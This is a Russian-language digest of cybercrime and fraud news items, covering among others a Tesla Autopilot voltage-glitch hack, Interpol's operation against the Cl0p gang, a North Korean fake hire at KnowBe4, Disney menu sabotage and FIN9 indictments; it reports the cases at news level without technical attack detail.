Исследователи из Технического университета Берлина смогли разблокировать
помощника по вождению Tesla, вызвав падение напряжения на процессоре на две
микросекунды, что позволило получить root-доступ к программному обеспечению
автопилота. Называя это «режимом Илона», поскольку он снимает с водителя
требование держать руки на руле, они смогли получить доступ к полному режиму
самостоятельного вождения, позволяющему автономное вождение без участия
водителя. Хотя это может быть плохой идеей, учитывая эффективность «полного
самостоятельного вождения» в реальном мире, хак, по крайней мере,
демонстрирует функциональную точку атаки, и подобные методы могут обеспечить
свободный доступ к другим функциям премиум-класса.
Хотя для атаки требуется физический доступ к компьютеру автомобиля и хорошо
оборудованному рабочему месту, в краткосрочной перспективе этот метод может
позволить владельцам транспортных средств использовать принадлежащее им
оборудование по своему усмотрению, а в долгосрочной перспективе, возможно,
позволит добиться успеха в убеждении производители, которые «представляют
собой услугу», не являются прибыльной стратегией. Возможно, это звучит
оптимистично, но, по крайней мере, для Tesla [было доказано, что это не самая
безопасная система на четырех
колесах](https://hackaday.com/2023/03/02/security-vulnerabilities-in-modern-
cars-somehow-not-surprising/) .
Опубликовано в Советы по безопасности , Советы по транспортуTagged Автопилот , полное самостоятельное вождение , root , безопасность , программное обеспечение , Tesla
итанский специалист по информационной безопасности прикинулся хакером, чтобы шантажировать своего работодателя.
Как это произошло: в 2018 году хакеры, используя вымогательское ПО, атаковали оксфордскую компанию. После инцидента злоумышленники связались с руководством организации и потребовали выкуп. Этой ситуацией решил воспользоваться ИБ- аналитик компании Эшли Лайлс, который принимал активное участие в внутреннем расследовании инцидентов. Лайлс получил доступ к переписке членов правления компании, изменил содержание исходного письма от вымогателей и указанный ими адрес, на который нужно было отправить выкуп. Он также создал адрес электронной почты, практически идентичный адресу злоумышленников, и некоторое время переписывался с руководством своей фирмы, требуя перевести деньги.
Однако выкуп он так и не получил. В компании обнаружили несанкционированный доступ к почте и отследили, что он был осуществлен с домашнего адреса Эшли Лайлса. За несколько дней до ареста неудачливый шантажист удалил все данные со своих устройств, пытаясь скрыть причастность к атаке на компанию. Но полицейским удалось восстановить информацию, которая стала прямым доказательством его преступления. Почти пять лет сотрудник отрицал причастность к инциденту, но в мае этого года Лайлс все-таки признал вину, в июле суд огласит окончательный приговор. Согласно британскому законодательству, несанкционированный доступ к компьютеру наказывается сроком до 2 лет, а шантаж – до 14 лет.
В американском округе Калкасье Пэриш (штат Луизиана) полиция установила и арестовала двух из трех членов группировки, промышлявших кражей и обналичиванием чеков из почтовых ящиков. Как уточняет местный телеканал KPLC, найти не могут самого старшего из мошенников — 28-летнего Алексиса Уотлера (Alexis Watler).
Двое других — 23-летний Маркус Хаффорд (Marcus Hafford) и 20-летняя Данна Сальдиерна (Danna Saldierna) — после предъявления им официальных обвинений были выпущены под залог. Среди вменяемых им эпизодов, помимо кражи, фигурируют также подделка документов, незаконные переводы денежных средств и рэкет. Что любопытно, сначала полиция арестовала девушку, и уже через нее удалось выйти на остальных подозреваемых.
Свои преступления троица совершала как минимум в августе и сентябре 2022 года. Чеки Хаффорд обналичивал при помощи случайных людей в социальных сетях. Он запрашивал у них банковские данные, после чего средства поступали на счет, а сам Хаффорд получал половину суммы. Суммарно им удалось украсть таким образом от 5 до 25 тысяч долларов.
source: kplctv.com/2023/03/30/cpso-2-arrested-1-wanted-depositing-checks- stolen-usps-drop-boxes
Обманули иностранцев на более 65 миллионов чешских Организовали схему мошенничества двое мужчин - украинец и гражданин Республики Чехия. Они наладили работу сall-центра в Днепре, с помощью которого выманивали деньги у граждан Чешской Республики. Организаторы и активные участники мошеннической схемы задержаны.
Преступную деятельность международной преступной организации пресекли работники Департамента борьбы с наркопреступностью совместно со следователями Главного следственного управления (ГСУ) Нацполиции и правоохранителями Чешской Республики под процессуальным руководством Офиса Генерального прокурора и при поддержке Европола и Евроюста.
Фигуранты попали в поле зрения полицейских летом прошлого года. Именно тогда правоохранители установили, что на территории Украины действует преступная организация с международными связями, которая «специализируется» на мошенничествах в отношении граждан Чешской Республики. Как установили оперативники, мошенничество осуществлялось с помощью телефонных звонков, используя «sip-телефонию» - подмену номеров. Звоня клиентам чешских банков, злоумышленники представлялись сотрудниками службы безопасности банковского учреждения и сообщали, что их счета взломаны, и рекомендовали срочно перевести все сбережения на другой «безопасный» счет. В дальнейшем работник call-центра звонил уже под видом полицейского и подтверждал правдивость первого звонка, рекомендуя немедленно выполнить требование «работника банка».
Для оперативного перекрытия незаконной деятельности членов преступной группировки следователи ГСУ инициировали подписание международного договора с правоохранителями Чешской Республики о создании совместной следственно- оперативной группы.
В процессе документирования правоохранители установили, что организовали мошенническую схему двое мужчин, граждане Украины и Чешской Республики. Они создали сall-центр в г. Днепр, обустроили его компьютерной техникой и SIP- телефонией, а к его работе привлекли более 20 человек, среди которых - местные жители и граждане иностранных стран. Их деятельность координировал один из организаторов - гражданин Чешской Республики, который специально для этого прибыл в Украину год назад.
Собрав необходимую доказательную базу, правоохранители провели спецоперацию, которая одновременно проходила на территории Украины и Чешской Республики. В результате проведенных мероприятий правоохранители задержали двух организаторов. Также украинские правоохранители задержали пятерых активных членов группировки, все они граждане иностранных стран. Сейчас решается вопрос об их экстрадиции.
Все пострадавшие - граждане Чешской Республики. Уже установлено 300 человек, которых обманули злоумышленники. По предварительным оценкам, им нанесен материальный ущерб на более 65 млн чешских крон, а это - более 108 миллионов гривен.
Сейчас следователи ГСУ Нацполиции расследуют уголовное производство по ч. 4 ст. 190 (Мошенничество совершенное в особо крупных размерах) и ч. 1, ч. 2 ст. 255 (Создание, руководство преступным сообществом или преступной организацией, а также участие в ней) Уголовного кодекса Украины.
Дальнейшие процессуальные решения в отношении остальных фигурантов, сообщения о подозрении и избрании мер пресечения, будут приниматься после поступления результатов экспертных исследований.
По украинскому законодательству фигурантам грозит до двенадцати лет лишения свободы с конфискацией имущества.
Обсуждаемое ограничение коснется только застрахованных предприятий.
Правительство Нидерландов недовольно компаниями, которые платят выкуп
преступникам-вымогателям. Министерство юстиции и безопасности Нидерландов
рассматривает вопрос о запрете страховым компаниям оплачивать выкуп
предприятиям, если последние вынуждены прекратить бизнес в результате
кибератаки с использованием вымогательского ПО. Обсуждаемое ограничение
коснется только застрахованных предприятий. Об этом сообщила голландская
вещательная ассоциация NOS.
При атаке с использованием программы-вымогателя данные компании шифруются и
она прекращает работу до тех пор, пока злоумышленникам не будут выплачены
деньги. При этом резервные копии данных также часто удаляются, что делает
восстановление трудным или даже почти невозможным. Идея властей состоит в том,
что если ни одна компания не будет платить выкуп, то преступникам не будет
смысла атаковать компании.
«Платежи поддерживают криминальную экосистему», — сообщил главный прокурор
Михель Цвинкельс (Michiel Zwinkels).
Злоумышленники могут использовать заработанные деньги для новых атак. По
словам экспертов, деньги, выплачиваемые одной жертвой, напрямую инвестируются
в инфраструктуру и ресурсы для атак на другие компании.
СЕУЛ, Корея - 30-месячное трансконтинентальное расследование и операция
привели к арестам и красным уведомлениям о подозреваемых, которые, как
считается, стоят за глобальной сетью преступлений, связанных с вредоносным ПО.
Два «красных уведомления», в которых содержится предупреждение о лицах,
разыскиваемых международным сообществом, были разосланы 194 странам-членам
Интерпола по запросу корейского отдела по расследованию киберпреступлений
через Национальное центральное бюро Интерпола в Сеуле.
Уведомления последовали за арестом в Украине шести членов печально известного
семейства программ-вымогателей во время глобальной операции, которую Интерпол
координировал с правоохранительными органами Кореи, Украины и США в июне.
Глобальная забастовка - под кодовым названием Operation Cyclone - последовала
за глобальными полицейскими расследованиями атак на корейские компании и
академические учреждения США со стороны группы, занимающейся рансомам Cl0p.
Операторы вредоносного ПО Cl0p в Украине предположительно атаковали частные и
бизнес-объекты в Корее и США, блокируя доступ к их компьютерным файлам и
сетям, а затем потребовали выкуп за восстановление доступа.
Предполагается, что подозреваемые содействовали передаче и выводу активов от
имени группы программ-вымогателей, а также угрожали обнародовать
конфиденциальные данные, если не будут произведены дополнительные платежи.
Операция Cyclone координировалась Центром киберфьюжн Интерпола в Сингапуре,
где заинтересованные стороны обменивались информацией в интерактивной и
безопасной среде через глобальную сеть и возможности Интерпола.
Полученные в результате разведданные позволили украинской полиции обыскать
более 20 домов, предприятий и транспортных средств, конфисковать имущество и
компьютеры и изъять 185 000 долларов США наличными, а также произвести шесть
арестов.
«Несмотря на нарастание глобальных атак программ-вымогателей, эта коалиция
полиции и частного сектора стала свидетелем одного из первых арестов
преступных группировок в мире правоохранительных органов, который посылает
мощный сигнал преступникам-вымогателям, что независимо от того, где они
прячутся в киберпространстве, мы будем их неустанно преследовать», сказал
директор Интерпола по киберпреступности Крейг Джонс.
Интерпол развернул операцию «Циклон» с помощью информации, предоставленной его
частными партнерами Trend Micro, CDI, «Лабораторией Касперского» , Palo
Alto Networks, Fortinet иGroup-IB в рамках проекта INTERPOL Gateway.
Gateway способствует укреплению партнерских отношений между
правоохранительными органами и частным сектором, позволяя генерировать данные
об угрозах из нескольких источников и позволяя полиции предотвращать атаки.
Еще одно свидетельство эффективности сотрудничества с частным сектором в
расследовании киберпреступлений: две корейские компании по киберугрозам - S2W
LAB и KFSI - также предоставили Интерполу ценный анализ данных в темной сети
на протяжении всей операции.
Операция Cyclone продолжает предоставлять доказательства, которые используются
для дальнейших расследований киберпреступлений и позволяют международному
полицейскому сообществу нарушать работу многочисленных каналов, используемых
киберпреступниками для отмывания криптовалюты.
Шесть подозреваемых, как полагают, тесно связаны с русскоязычной
киберпреступной бандой, известной тем, что она называет своих жертв на сайте
утечки изпользуя To, а также переводит средства на сумму более 500 миллионов
долларов, связанных с многочисленными операциями с программами-вымогателями.
Их атаки нацелены на ключевые объекты инфраструктуры, такие как транспорт и
логистика, образование, производство, энергетика, финансы, аэрокосмическая
промышленность, телекоммуникации, здравоохранение и высокотехнологичные
секторы по всему миру.
В случае признания виновным шестерым подозреваемым грозит до восьми лет
лишения свободы.
__
](https://www.interpol.int/News-and-Events/News/2021/INTERPOL-led-operation- takes-down-prolific-cybercrime-ring)
Major gang members in handcuffs, assets seized
www.interpol.int
В Перми суд огласил приговор ранее неоднократно судимому 42-летнему жителю Челябинской области. Он признан виновным в 34 эпизодах хищений денежных средств, совершенных дистанционным способом. Ущерб от противоправной деятельности составил свыше 900 тысяч рублей.
Следствием установлено, что мужчина звонил на телефон жителям Пермского края и представлялся сотрудником службы безопасности банка. Он сообщал, что с использованием банковской карты граждан проводятся несанкционированные операции. Далее злоумышленник убеждал потерпевших в том, что для предотвращения незаконного списания денежных средств им необходимо выполнить ряд действий через мобильное приложение банка или банкомат. Введенные в заблуждение граждане, следовали указаниям звонившего и переводили деньги на подконтрольные ему счета. В некоторых случаях лжесотрудник банка просил потерпевших сообщить ему реквизиты карты, после чего похищал денежные средства.
Похищенным злоумышленник распоряжался по своему усмотрению.
На момент совершения преступления мужчина отбывал наказание в местах лишения свободы.
Суд с учетом неотбытой части по ранее вынесенному приговору назначил виновному наказание в виде 15 лет лишения свободы с отбыванием в колонии строгого режима с ограничением свободы на срок 1 год. Также он обязан возместить ущерб потерпевшим.
В состав группировки входило десять человек от 20 до 26 лет - это двое организаторов и сообщники, которые путем обмана присваивали виртуальные активы граждан. Обвинительный акт направлен в суд, злоумышленникам грозит до двенадцати лет за решеткой.
Напомним, что в начале марта этого года столичные киберполицейские совместно со следователями следственного отдела Дарницкого управления полиции в г. Киеве под процессуальными руководством Дарницкой окружной прокуратуры обнаружили и пресекли деятельность преступной организации, участники которой мошенническим путем завладевали средствами граждан.
Организаторами оказались 21-летний и 26-летний жители Киевской области, которые привлекли к противоправной деятельности еще восьмерых жителей Киева, Житомирской, Винницкой и Ровенской областей от 20-ти до 23-х лет. Подавляющее большинство фигурантов знакомы между собой еще с детства.
Злоумышленники через телеграм-каналы распространяли объявления о заработке на криптовалюте и в дальнейшем переписывались с потенциальными жертвами. Для этого они обустроили на территории Киевской области деятельность двух call- центров. Операторы убеждали пострадавших перечислить собственные активы на заранее созданные фигурантами криптокошельки.
Чтобы войти в доверие к гражданам и подтолкнуть их перечислить большие суммы, злоумышленники сначала возвращали так называемые инвестиции с небольшим избытком, а в дальнейшем присваивали вложенные средства и переставали выходить на связь.
Правоохранители провели 28 обысков по адресам проживания фигурантов и в их автомобилях, где изъяли вещественные доказательства преступной деятельности. Злоумышленникам было сообщено о подозрении в совершении преступлений, предусмотренных ч. 1, 2 ст. 255 (Создание, руководство, участие в преступной организации), ч. 4 ст. 190 и ч. 4 ст. 28, ч. 5 ст. 190 (Мошенничество) Уголовного кодекса Украины.
Сейчас досудебное расследование в уголовном производстве завершено, обвинительный акт направлен в Дарницкий районный суд города Киева для рассмотрения дела по существу. Фигурантам грозит до 12 лет лишения свободы с конфискацией имущества.
• Source: https://kyiv.npu.gov[.]ua/news/pryvlasniuvaly-virtualni-aktyvy-pid- pryvodom-onlain-zarobitku-u-kyievi-sudytymut-chleniv-zlochynnoi-orhanizatsii
Американская ИБ-компания по ошибке наняла на должность главного инженера- программиста, как утверждается, северокорейского хакера. После получения корпоративного компьютера он сразу же начал скачивать на него вредоносное ПО.
Инженер на удаленке
Американская компания KnowBe4, занимающаяся вопросами кибербезопасности, по ошибке наняла хакера на должность главного инженера-программиста. Об этом KnowBe4 сообщила в своем блоге.
Работать новый инженер должен был удаленно. Все этапы отбора и найма тоже происходили дистанционно.
Представители компании утверждают, что быстро разоблачили злоумышленника и негативных последствий удалось избежать: «Не было получено никакого незаконного доступа, и никакие данные не были утеряны, скомпрометированы или украдены из каких-либо систем KnowBe4».
Не проработал и дня
В KnowBe4 заметили что-то подозрительное, когда на служебный компьютер начала загружаться вредоносная программа. Рабочую станцию Mac отправили новому сотруднику по указанному им адресу. Как только она была получена, она немедленно начала загружать вредоносное ПО.
Система обнаружила серию подозрительных действий и оповестила Центр операций по безопасности (SOC). Когда поступили эти оповещения, команда SOC KnowBe4 связалась с пользователем, чтобы узнать об аномальной активности и возможной причине. Он сначала заявил, что не может говорить, а затем вообще перестал отвечать.
Согласно истории сеанса, атакующий выполнил различные действия для манипулирования файлами и попытался запустить несанкционированное программное обеспечение. Для загрузки вредоносного ПО он использовал Raspberry Pi.
Как хакер прошел отбор на вакансию?
HR-команда провела четыре интервью на основе видеоконференций и подтвердила, что человек соответствует фотографии, предоставленной в его заявлении. Как позже выяснилось, эта фотография была изменена с помощью ИИ.
Слева — оригинальное стоковое фото, а справа — ИИ-дипфейк, отправленный в отдел кадров KnowBe4.
Кроме того, были проведены проверка биографических данных и все другие стандартные проверки перед приемом на работу, в том числе проверка рекомендаций. Подозрений не возникло из-за использования украденной личности реального человека.
«Субъект продемонстрировал высокий уровень мастерства в создании правдоподобной личности», — говорится в отчете пострадавшей компании о происшествии. Там утверждается, что это северокорейская «хорошо организованная, спонсируемая государством, крупная преступная группировка с обширными ресурсами».
Представители KnowBe4 объясняют, как работают такие группировки: «Фальшивый работник просит отправить его рабочую станцию на адрес, который по сути является "IT mule laptop farm". Затем они подключаются через VPN из того места, где они на самом деле физически находятся (в Северной Корее или в Китае), и работают в ночную смену, чтобы казалось, что они работают днем в США. Афера заключается в том, что они на самом деле выполняют работу, получают хорошую оплату и отдают большую часть в Северную Корею для финансирования своих незаконных программ».
Хакер из Бреста почти два года взламывал сайты и продавал информацию за рубеж, сообщает БЕЛТА со ссылкой на официального представителя управления Следственного комитета по Брестской области Романа Зармаева.
"Молодого человека привлекла идея изучения компьютерных технологий, разработки программ и возможности на этом заработать. Он проходил онлайн-курсы, применял полученные знания на практике. К сожалению, его больше заинтересовала темная сторона интернета, которую он посчитал более прибыльной", - обратил внимание Роман Зармаев.
Следствие располагает сведениями, что с декабря 2020 года 21-летний парень разработал несколько вредоносных программ. Они подбирали пароли к учетным записям банков, платежных систем и других веб-сайтов. Заказы молодой человек получал на иностранных форумах, взламывал аккаунты и продавал информацию. Почти за два года хакер заработал около $6 тыс.
На след злоумышленника сотрудники милиции вышли во время оперативно-разыскных мероприятий. У фигуранта изъяли всю компьютерную технику. Брестский межрайонный отдел Следственного комитета возбудил уголовное дело по ч.1 ст.349 (несанкционированный доступ к компьютерной информации) и ч.1 ст.354 (разработка, использование либо распространение компьютерных программ) УК.
Стажер компании Brewer Garrett потерял три тысячи долларов, став жертвой мошенничества. Местная полиция уточняет что инцидент произошел в американском городке Мидлберг (штат Огайо).
Пострадавший стажер сам обратился в полицию, рассказав, что ему по электронной почте пришло сообщение, написанное якобы от имени президента Brewer Garrett. Отправитель попросил дать ему номер телефона стажера, после чего переписка продолжалась уже таким способом. От «главы компании» поступила просьба помочь в организации пикника компании. На нем якобы должны были вручать подарочные карты особо отличившимся сотрудникам.
В итоге стажер на свои деньги купил подарочные карты на 1400 долларов в Walgreen’s, после чего отправился в CVS и потратил там еще 1600 долларов, желая угодить руководству Brewer Garrett. Затем он сфотографировал номера и коды подарочных карт и отправил их на номер телефона, с которым переписывался. Позже он узнал, что это был вовсе не президент компании. Все, что смогли сделать полицейские — отправили стажера в отдел по борьбе с мошенничеством его банка и вручили ему памятки для жертв мошенников.
source: cleveland.com/news/2023/07/company-intern-loses-3000-in-gift-card- scam-middleburg-heights-police-blotter.htm
Полиция Турции задержала и арестовала студента университета, который обвиняется в разработке тщательно продуманной схемы использования искусственного интеллекта и скрытых устройств. Сложная схема включает скрытую камеру и наушник для прослушивания ответов.
Фотоиллюстрация того, как могла бы выглядеть камера на пуговице рубашки.
Сообщается, что неназванный студент заключен в тюрьму до суда после инцидента, который произошел в юго-западной провинции Ыспарта, где студент был пойман на подозрительном поведении во время TYT. TYT — это общенациональный экзамен в Турции, на котором определяется пригодность экзаменуемого к поступлению в университет. Он состоит из двух частей, которые вместе называются «Тест основной квалификации» — «Продвинутый тест квалификации». В конечном итоге этот экзамен и определяет право человека на поступление в университет в Турции. Мошенничество на экзамене в этой стране является серьёзным правонарушением.
На опубликованном полицией города Ыспарты (тур. Isparta, город в западной Турции) [видео](https://www.dailymail.co.uk/video/news/video-3209135/Video- Turkish-police-arrest-student-AI-cheating-device-entrance-exam.html), показывается, как работает система мошенничества. На видео полицейский сканирует вопрос, а программное обеспечение искусственного интеллекта выдает правильный ответ через наушник.
Источник отмечает, что помимо студента, турецкая полиция задержала ещё одного человека за помощь студенту во время экзамена. Полиция обнаружила мобильный телефон, который якобы мог передавать разговорные звуки другому человеку, обеспечивая двустороннюю связь.
источник Ars Technica. Источник: [arstechnica.com](https://arstechnica.com/information- technology/2024/06/turkish-student-creates-custom-ai-device-for-cheating- university-exam-gets-arrested/)
Спустя почти два года судебных тяжб Фонтрелл Антонио Бейнс, который известен под псевдонимом «Nuke Bizzle», признался в 92 мошеннических заявках на пособие по безработице в период пандемии, которые привели к убыткам на сумму более 700 000 долларов США и попытке убытков на сумму около 1,25 миллиона долларов США, согласно данным Министерства Юстиции.
Бейнсу может грозить до 20 лет федерального тюремного заключения. Ожидается, что он также признает себя виновным по одному пункту обвинения в незаконном владении огнестрельным оружием после того, как он признал, что у него был полуавтоматический пистолет и 14 патронов к нему, будучи судимым за уголовное преступление. Это может добавить до 10 лет к его сроку заключения.
Ранее, в сентябре 2020 года Бейнс выпустил песню на «Spotify» под названием «EDD», что является прямой отсылкой на Департамент развития занятости Калифорнии, который управляет государственными пособиями по безработице.
• Клип:
Операция Destabilise
NCA при содействии международных партнеров разоблачило разветвленные российские сети по отмыванию денег посредством криптовалют, деятельность которых связана с торговлей наркотиками и оружием, программами-вымогателями и шпионажем.
__https://twitter.com/x/status/1864333958294454736
В центре схемы — две российские компании Smart Group и TGR Group. По версии властей, они помогали преступным группировкам обменивать криптовалюту на наличные и переводить средства за границу — более чем в 30 стран.
Среди их клиентов, помимо крупных преступных синдикатов вроде Kinahan, числились российские олигархи и представитеи элиты, стремившиеся обойти санкции. С конца 2022 по лето 2023 года сеть Smart использовалась для финансирования шпионских операций в пользу РФ.
По итогам операции правоохранители арестовали 84 человека, многие из которых уже отбывают тюремное заключение, а также изъяли более 20 млн фунтов стерлингов ($25,4 млн) наличными и в криптовалютах.
Имена
OFAC ввело санкции против связанных со Smart и TGR пяти лиц и четырех организаций: TGR Partners, TGR Corporate Concierge LTD, TGR DWC-LLC и Siam Expert. Последняя способствовала экспорту электронных компонентов в РФ.
Компанию Smart возглавляет включенная в санкционный список с ноября 2023 года Екатерина Жданова, которая тесно сотрудничала с Хаджи-Муратом Магомедовым и Никитой Красновым.
Компанией TGR руководят Джордж Росси, его заместитель Елена Чиркинян и Андрейс Браденс, также известный как Андрейс Каренокс.
Как утверждает NCA, многие из операций по отмыванию денег проведены при посредничестве Ждановой и Магомедова. Краснов работал с курьерскими сетями в Великобритании, собирая наличные для дальнейшего обмена. Этими услугами воспользовались по меньшей мере 22 местные преступные группировки.
Только один курьер из Лондона, Фавад Саиди, помог отмыть более 15 млн фунтов стерлингов ($19,1 млн). Его приговорили к четырем годам и четырем месяцам тюрьмы.
Другую курьерскую сеть для проведения незаконных операций по всей Европе возглавляли Семен Куксов и Андрей Дзекта при координации Краснова. По данным правоохранителей, за два месяца через них прошло более 12 млн фунтов стерлингов ($15,2 млн).
Куксова приговорили к пяти годам и семи месяцам тюрьмы, Дзекту — к пяти годам. Связанного с ними курьера Игоря Логвинова арестовали в Ирландии и приговорили к трем годам заключения.
По утверждению властей, Елена Чиркинян из TGR Group в 2023 году помогла в сокрытии предполагаемого перевода от Russia Today в пользу русскоязычной материнской медиаорганизации в Великобритании, находящейся под санкциями.
Жданова, согласно материалам дела, в марте 2022 года помогла перевести в Великобританию более 2 млн фунтов стерлингов ($2,54 млн) для российского клиента, которые он использовал для анонимной покупки недвижимости.
Также Жданову связывают с группировкой вымогателей Ryuk и транзакциями на сумму более $2,3 млн в их пользу.
Криптовалютные адреса Smart и TGR регулярно совершали транзакции с биржей Garantex, находящейся под санкциями Великобритании и США с 2022 года.
Напомним, в марте Transparency International Russia сообщила, что обменники из «Москва-Сити» помогают обналичивать USDT в Великобритании.
Аналитики Chainalisys в отчете от сентября 2024 года утверждают, что последние принятые в криптозаконы РФ направлены на уклонение от санкций.
• Source: https://home.treasury[.]gov/news/press-releases/jy2735
• Source: https://www.nationalcrimeagency[.]gov.uk/news/operation-destabilise- nca-disrupts-multi-billion-russian-money-laundering-networks-with-links-to- drugs-ransomware-and-espionage-resulting-in-84-arrests
По словам телеканала CNN, американская разведка начала расшифровку данных о коронавирусе, полученных из лаборатории Ухани. Источник СМИ указал, что американские разведслужбы могли получить доступ к секретной информации через взлом облачных серверов. Лаборатории, занимающиеся подобными исследованиями, обычно подключены к ним.
В марте этого года некоторые специалисты ВОЗ заявили о том, что Китай не предоставляет все данные об истоках пандемии коронавируса. В частности, австралийский эксперт по инфекционным заболеваниям и член команды ВОЗ Доминик Дуайер запросил у Китая больничные карты первых 174 пациентов с COVID-19, на что получил отказ. Ему предоставили только общую информацию.
Из-за сокрытия некоторой информации многие страны усомнились в правдоподобности мартовского доклада ВОЗ о версиях происхождения коронавируса. Наиболее вероятной организация назвала зоонозное происхождение вируса и его передачу к человеку от панголинов и летучих мышей, наименее вероятной — версию об искусственном происхождении. Она пришла к этому выводу на основе анализа всех имеющихся аргументов за и против той или иной теории.
Активнее остальных за искусственное происхождение коронавируса выступает США. Члены американской республиканской партии с начала этого года требуют у правительства введения санкций против уханьских учёных и членов правительства КНР, препятствующих расследованию и отказывающихся предоставлять все данные о первых больных. На основании собственного расследования, в ходе которого была изучена информация из открытых источников, партия обвиняет Китай в сокрытии факта лабораторного происхождения SARS-CoV-2.
В конце мая этого года Байден поручил спецслужбам США до сентября собрать всю информацию и проверить версию о том, что вирус вышел из лаборатории Уханя. Он не указал, как именно они будут устанавливать сотрудничество с Китаем по решению этого вопроса. Китайское правительство само обвиняет США в том, что вирус создали в американских лабораториях. Оно назвало версию об утечке «кампанией клеветы и перекладыванием вины».
6 августа телеканал CNN сообщил, что американской разведке удалось достать данные о коронавирусе, которые пыталась скрыть Уханьская лаборатория. Предположительно, это произошло за счёт взлома облачных серверов, но точных данных СМИ не сообщает.
По словам телеканала, сейчас спецслужбы занимаются расшифровкой этой «гигантской базы данных». Основными проблемами, с которыми столкнулась разведка, стали наличие вычислительных мощностей для обработки информации и компетентных кадров, хорошо знающих все нюансы специального северокитайского (мандаринского) языка.
Для обработки данных спецслужбы задействовали суперкомпьютеры в Национальных лабораториях Министерства энергетики, объединяющих почти два десятка правительственных исследовательских институтов. С набором квалифицированного персонала дела обстоят сложнее. Чтобы перевести специализированный текст необходимы не только американские специалисты в области генетики, вирусологии и других смежных дисциплин, но и грамотные лингвисты, в идеальной форме владеющие северокитайским языком. В материале много внутренних научных терминов, которые также предстоит расшифровать лингвистам.
По словам источника CNN, весь персонал, задействованный при расшифровке, должен быть проверен спецслужбами. Из-за этого очень маленький круг людей будет соответствовать всем требованиям разведки — идеальное знание северокитайского языка, осведомлённость в специализированной терминологии и непогрешимость перед американским правительством. Это дополнительно усложняет расшифровку данных.
Телеканал утверждает, что с этой базой спецслужбы рассчитывают ответить на вопрос, как вирус перешёл от животного к человеку. Эта информация имеет решающее значение в разрешении спора между сторонниками искусственного и естественного происхождения коронавируса. При этом часть источников СМИ заверяет, что её всё равно будет недостаточно для утверждения окончательного вердикта. Спецслужбам придётся искать дополнительные данные об истоках эпидемии, первых больных и мутациях коронавируса, которую, по их словам, Китай отказывается предоставлять.
• Source: <https://edition.cnn.com/2021/08/05/politics/covid-origins-genetic- data-wuhan-lab/index.html>
В подмосковном Серпухове 19-лений сотрудник «М-Видео» украл со склада на 2 миллиона рублей айфонов. На преступление он пошел, чтобы погасить свои кредиты за скины в компьютерной игре CS:GO.
Кладовщик оказался заядлым геймером. Чтобы купить цветные скины на оружие в игре, он набрал микрозаймов на 300 тысяч рублей. Когда понял, что с зарплат долг ему не погасить, он решил обнести склад в магазине, в котором работал.
В первый раз парень вынес девять айфонов и макбук, но был тут же пойман, так как попал на камеры видеонаблюдения. Краденое пришлось вернуть. Интересно, что руководство не стало привлекать воришку, работодатель решил его понять и простить, и даже не уволил с работы.
Тогда геймер предпринял еще одну попытку обнести рабочее место. На этот раз он вынес 15 айфонов на 2 миллиона рублей, продал их на «Горбушке» и даже успел оплатить долги.
Бывший сотрудник Disney, недовольный своим увольнением, предположительно неоднократно взламывал программное обеспечение для создания меню, используемое ресторанами Walt Disney World, и изменял информацию об аллергии, указывая, что блюда с арахисом безопасны для людей с аллергией. Кроме того, он добавлял нецензурные слова в меню, а также менял шрифты на Wingdings — шрифт, состоящий из символов, как говорится в федеральной жалобе.
Подозреваемый Майкл Шойер предположительно проник в эксклюзивную для Disney систему создания и управления меню, разработанную сторонней компанией (в жалобе обозначена как «Компания B»). В этой системе он, предположительно, использовал пароли , доступные ему ещё с работы в Disney, чтобы внести изменения, которые сделали меню недоступными на несколько недель.
" Злоумышленник манипулировал информацией об аллергии в меню, добавив сведения о том, что некоторые блюда безопасны для людей с аллергией на арахис, что могло быть смертельно опасно для аллергиков," — говорится в жалобе. В Disney заметили изменения на стадии печати и предотвратили их распространение в рестораны.
Шойер, по жалобе, также пытался взломать учетные записи сотрудников, блокируя их доступ и с использованием скрипта для автоматического входа. Помимо этого, он собрал личную информацию о четырех сотрудниках, включая их домашние адреса, телефонные номера и данные о родственниках, и даже посетил дом одного из них.
Эти действия стали заметны сотрудникам после того, как шрифты были изменены на Wingdings, что сделало меню недоступными и парализовало систему создания меню на несколько недель. Disney был вынужден использовать резервные копии для восстановления системы и внедрить ручные процессы для временного решения проблемы.
Также Шойер якобы взломал серверы FTP компании B и загрузил файлы с незначительно измененными меню, содержащими ошибочные данные о ценах и аллергенах , которые могли быть опасны для жизни. Позже, он изменил QR-коды на больших уличных меню, направляя пользователей на сайт boycott-israel.org.
Кроме того, Disney фигурирует в отдельном судебном деле о смерти посетителя, произошедшей из-за аллергической реакции, однако эти два дела не связаны между собой.
Траффер из Рязанской области предстанет перед судом за взлом интернет- аккаунтов. Подробности уголовного дела рассказали в пресс-службе регионального УМВД в четверг, 22 августа.
Выявить траффера удалось благодаря материалам, собранным сотрудниками отдела по борьбе с киберпреступлениями. В ходе оперативных мероприятий полицейские установили, что что 19-летний житель Касимова с помощью стилера взламывал электронные почтовые ящики и игровые аккаунты пользователей.
Траффер получил доступ к личным данным более тысячи IP-адресов, принадлежащих, так гражданам РФ и других государств. Украденные логины и пароли траффер продавал.
В настоящее время уголовное дело в отношении рязанца предъявили обвинение по части 2 статьи 272 УК РФ и части 2 статьи 273 УК РФ. Уголовное дело направлено в суд для рассмотрения по существу. Трафферу грозит до 5 лет тюрьмы.
Американская прокуратура предъявила официальные обвинения четырем гражданам Вьетнама, входившим в хакерскую группировку FIN9. По данным следствия, они принимали непосредственное участие в атаках на компании в Соединенных Штатах, общий ущерб которых составил 71 миллион долларов.
«Обвиняемые киберпреступники FIN9 — известные хакеры, которые на протяжении многих лет использовали фишинговые кампании, атаки на цепочки поставок и другие способы, чтобы воровать миллионов долларов у своих жертв», — заявил прокурор США Филип Сэлинджер.
В число обвиняемых вошли Та Ван Тай (скрывался под никами Quynh Hoa и Bich Thuy), Нгуен Вьет Куок (Tien Nguyen), Нгуен Ван Труонг (Chung Nguyen) и Нгуен Транг Сюен. Проникнув в сети своих жертв, члены FIN9 использовали их для кражи непубличных сведений, в том числе о выплатах сотрудникам. В рамках одной из излюбленных схем они получали доступ к программам вознаграждения работников, после чего перенаправляли деньги на свои счета. Помимо этого, они воровали данные кредитных карт сотрудников компаний и их клиентов для последующей перепродажи на даркнет-площадках.
justice[.]gov/usao-nj/pr/four-members-notorious-cybercrime-group-fin9-charged- roles-attacking-us-companies
По словам специалистов BlackCat – пример вертикального расширения бизнеса.
В ходе анализа атак кибервымогательских группировок BlackCat и BlackMatter специалисты выявили много общего в их тактиках, техниках и процедурах (TTP), что может свидетельствовать о тесной связи между ними.
